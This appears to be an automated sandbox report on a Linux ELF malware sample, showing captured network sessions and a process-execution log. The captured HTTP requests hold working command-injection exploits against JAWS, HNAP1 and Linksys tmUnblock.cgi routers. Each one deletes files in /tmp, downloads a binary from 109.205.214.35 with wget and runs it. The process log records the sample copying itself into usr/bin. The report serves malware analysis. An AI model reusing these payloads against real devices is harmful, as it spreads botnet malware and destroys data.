                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 48 31 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0d 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 3a 20 2f 73 68 65 6c 6c 3f 63 64 20 2f 74 6d 70 3b 72 6d 20 2d 72 66 20 2a 3b 77 67 65 74 20 0d 0a 3c 50 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e
                                                        Data Ascii: <HTML><HEAD><TITLE>File Not Found</TITLE></HEAD><BODY><H1>File Not Found</H1>The requested URL was not found on this server: /shell?cd /tmp;rm -rf *;wget <P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2313192.168.2.1345214194.60.201.3480
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:51.676631927 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:51.851830006 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:23:51 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2314192.168.2.1346106219.79.115.7980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:51.829411983 CET259OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2315192.168.2.133474095.31.220.20980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:52.388137102 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2316192.168.2.13584605.197.27.18380
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:52.389691114 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2317192.168.2.133373045.223.2.1198081
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:52.622452021 CET763OUTPOST /HNAP1/ HTTP/1.0
                                                        Content-Type: text/xml; charset="utf-8"
                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://109.205.214.35/mips && chmod +x mips;./mips hnap`
                                                        Content-Length: 640
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2318192.168.2.134736413.38.156.8480
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:52.688255072 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2319192.168.2.133897072.130.113.338080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:52.934448004 CET442OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 41 6d 61 6b 61 6e 6f 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Amakano.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        System Behavior

                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/tmp/AFWaD3vnqR.elf
                                                        Arguments:/tmp/AFWaD3vnqR.elf
                                                        File size:122848 bytes
                                                        MD5 hash:d86f1705e5e8b6dd204b285b9b5bdb68

                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/tmp/AFWaD3vnqR.elf
                                                        Arguments:-
                                                        File size:122848 bytes
                                                        MD5 hash:d86f1705e5e8b6dd204b285b9b5bdb68

                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/bin/sh
                                                        Arguments:sh -c "rm -rf usr/bin && mkdir usr; >usr/bin && mv /tmp/AFWaD3vnqR.elf usr/bin; chmod 777 usr/bin"
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/bin/sh
                                                        Arguments:-
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/usr/bin/rm
                                                        Arguments:rm -rf usr/bin
                                                        File size:72056 bytes
                                                        MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/bin/sh
                                                        Arguments:-
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/usr/bin/mkdir
                                                        Arguments:mkdir usr
                                                        File size:88408 bytes
                                                        MD5 hash:088c9d1df5a28ed16c726eca15964cb7

                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/bin/sh
                                                        Arguments:-
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/usr/bin/mv
                                                        Arguments:mv /tmp/AFWaD3vnqR.elf usr/bin
                                                        File size:149888 bytes
                                                        MD5 hash:504f0590fa482d4da070a702260e3716

                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/bin/sh
                                                        Arguments:-
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/usr/bin/chmod
                                                        Arguments:chmod 777 usr/bin
                                                        File size:63864 bytes
                                                        MD5 hash:739483b900c045ae1374d6f53a86a279

                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/tmp/AFWaD3vnqR.elf
                                                        Arguments:-
                                                        File size:122848 bytes
                                                        MD5 hash:d86f1705e5e8b6dd204b285b9b5bdb68

                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/tmp/AFWaD3vnqR.elf
                                                        Arguments:-
                                                        File size:122848 bytes
                                                        MD5 hash:d86f1705e5e8b6dd204b285b9b5bdb68
                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/tmp/AFWaD3vnqR.elf
                                                        Arguments:-
                                                        File size:122848 bytes
                                                        MD5 hash:d86f1705e5e8b6dd204b285b9b5bdb68
                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/tmp/AFWaD3vnqR.elf
                                                        Arguments:-
                                                        File size:122848 bytes
                                                        MD5 hash:d86f1705e5e8b6dd204b285b9b5bdb68
                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/tmp/AFWaD3vnqR.elf
                                                        Arguments:-
                                                        File size:122848 bytes
                                                        MD5 hash:d86f1705e5e8b6dd204b285b9b5bdb68
                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/tmp/AFWaD3vnqR.elf
                                                        Arguments:-
                                                        File size:122848 bytes
                                                        MD5 hash:d86f1705e5e8b6dd204b285b9b5bdb68
                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/tmp/AFWaD3vnqR.elf
                                                        Arguments:-
                                                        File size:122848 bytes
                                                        MD5 hash:d86f1705e5e8b6dd204b285b9b5bdb68
                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/tmp/AFWaD3vnqR.elf
                                                        Arguments:-
                                                        File size:122848 bytes
                                                        MD5 hash:d86f1705e5e8b6dd204b285b9b5bdb68
                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/tmp/AFWaD3vnqR.elf
                                                        Arguments:-
                                                        File size:122848 bytes
                                                        MD5 hash:d86f1705e5e8b6dd204b285b9b5bdb68
                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/tmp/AFWaD3vnqR.elf
                                                        Arguments:-
                                                        File size:122848 bytes
                                                        MD5 hash:d86f1705e5e8b6dd204b285b9b5bdb68
                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/tmp/AFWaD3vnqR.elf
                                                        Arguments:-
                                                        File size:122848 bytes
                                                        MD5 hash:d86f1705e5e8b6dd204b285b9b5bdb68
                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/tmp/AFWaD3vnqR.elf
                                                        Arguments:-
                                                        File size:122848 bytes
                                                        MD5 hash:d86f1705e5e8b6dd204b285b9b5bdb68
                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/tmp/AFWaD3vnqR.elf
                                                        Arguments:-
                                                        File size:122848 bytes
                                                        MD5 hash:d86f1705e5e8b6dd204b285b9b5bdb68
                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/tmp/AFWaD3vnqR.elf
                                                        Arguments:-
                                                        File size:122848 bytes
                                                        MD5 hash:d86f1705e5e8b6dd204b285b9b5bdb68
                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/tmp/AFWaD3vnqR.elf
                                                        Arguments:-
                                                        File size:122848 bytes
                                                        MD5 hash:d86f1705e5e8b6dd204b285b9b5bdb68
                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/tmp/AFWaD3vnqR.elf
                                                        Arguments:-
                                                        File size:122848 bytes
                                                        MD5 hash:d86f1705e5e8b6dd204b285b9b5bdb68
                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/tmp/AFWaD3vnqR.elf
                                                        Arguments:-
                                                        File size:122848 bytes
                                                        MD5 hash:d86f1705e5e8b6dd204b285b9b5bdb68
                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/tmp/AFWaD3vnqR.elf
                                                        Arguments:-
                                                        File size:122848 bytes
                                                        MD5 hash:d86f1705e5e8b6dd204b285b9b5bdb68
                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/tmp/AFWaD3vnqR.elf
                                                        Arguments:-
                                                        File size:122848 bytes
                                                        MD5 hash:d86f1705e5e8b6dd204b285b9b5bdb68
                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/tmp/AFWaD3vnqR.elf
                                                        Arguments:-
                                                        File size:122848 bytes
                                                        MD5 hash:d86f1705e5e8b6dd204b285b9b5bdb68

                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/tmp/AFWaD3vnqR.elf
                                                        Arguments:-
                                                        File size:122848 bytes
                                                        MD5 hash:d86f1705e5e8b6dd204b285b9b5bdb68

                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/tmp/AFWaD3vnqR.elf
                                                        Arguments:-
                                                        File size:122848 bytes
                                                        MD5 hash:d86f1705e5e8b6dd204b285b9b5bdb68

                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/usr/libexec/gnome-session-binary
                                                        Arguments:-
                                                        File size:334664 bytes
                                                        MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/bin/sh
                                                        Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Start time (UTC):04:21:46
                                                        Start date (UTC):21/03/2024
                                                        Path:/usr/libexec/gsd-housekeeping
                                                        Arguments:/usr/libexec/gsd-housekeeping
                                                        File size:51840 bytes
                                                        MD5 hash:b55f3394a84976ddb92a2915e5d76914